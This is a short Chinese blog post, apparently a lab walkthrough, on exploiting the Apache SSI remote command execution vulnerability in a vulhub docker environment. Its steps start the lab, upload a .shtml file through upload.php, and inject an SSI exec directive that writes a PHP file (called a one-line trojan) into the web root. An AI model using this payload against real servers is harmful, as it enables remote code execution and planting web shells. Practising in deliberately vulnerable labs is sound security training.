vulhub中的Apache SSI 远程命令执行漏洞

爱喝水的泡泡2024-01-09 11:42

Apache SSI 远程命令执行漏洞

1.cd到ssi-rce

cd /opt/vulhub/httpd/ssi-rce/

2.执行docker-compose up -d

docker-compose up -d

3.查看靶场是否开启成功

dooker ps

拉取成功了

4.访问url

这里已经执行成功了,注意这里需要加入/upload.php

5.写入一句话木马

<!--#exec cmd="echo '<?php phpinfo(); ?>' > /var/www/html/this.php" -->

6.提交查询

7.点击shell.shtml

8.查看是否写入成功

docker exec -it ssi-rce_apache_1 /bin/bash

9.获取phpinfo

相关推荐
热爱编程的小曾2 小时前
下载Stegsolve.jar后运行报错 ”Error: Unable to access jarfile stegslove. ”
apache
鸠摩智首席音效师8 小时前
如何解决 Apache 中 “CORS no allow credentials” 错误 ?
apache
~央千澈~14 小时前
如果你的网站是h5网站,如何将h5网站变成小程序-除开完整重做方法如何快速h5转小程序-h5网站转小程序的办法-优雅草央千澈
前端·apache
鸠摩智首席音效师1 天前
如何在 Apache 中创建单个文件的别名 ?
apache
Hello.Reader2 天前
深入解析 Apache APISIX
java·apache
hwscom2 天前
如何永久解决Apache Struts文件上传漏洞
java·服务器·struts·web安全·apache
白开水2332 天前
Apache RocketMQ 5.1.3安装部署文档
apache·rocketmq
s甜甜的学习之旅3 天前
Apache POI练习代码
apache
是小崔啊3 天前
开源轮子 - Apache Common
java·开源·apache
程序猿阿伟4 天前
《探索 Apache Spark MLlib 与 Java 结合的卓越之道》
java·spark-ml·apache
热门推荐
01大模型国产化适配7-华为昇腾LLM落地可选解决方案(MindFormers、ModelLink、MindIE)02ARM学习(31)编译器对overlay方式的支持03玄机平台应急响应—webshell查杀04电赛2024年H题智能小车基于MSPM0G3507主控MCU(利用8路灰度加上MPU6050的解决方式)具体项目报告05【一文读懂】NTN(非地面网络)技术介绍06(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明07Ubuntu 20.04使用Livox mid 360 测试 FAST_LIO08组基轨迹建模 GBTM的介绍与实现(Stata 或 R)09Docker 夺命连环 15 问10STM32 无法烧录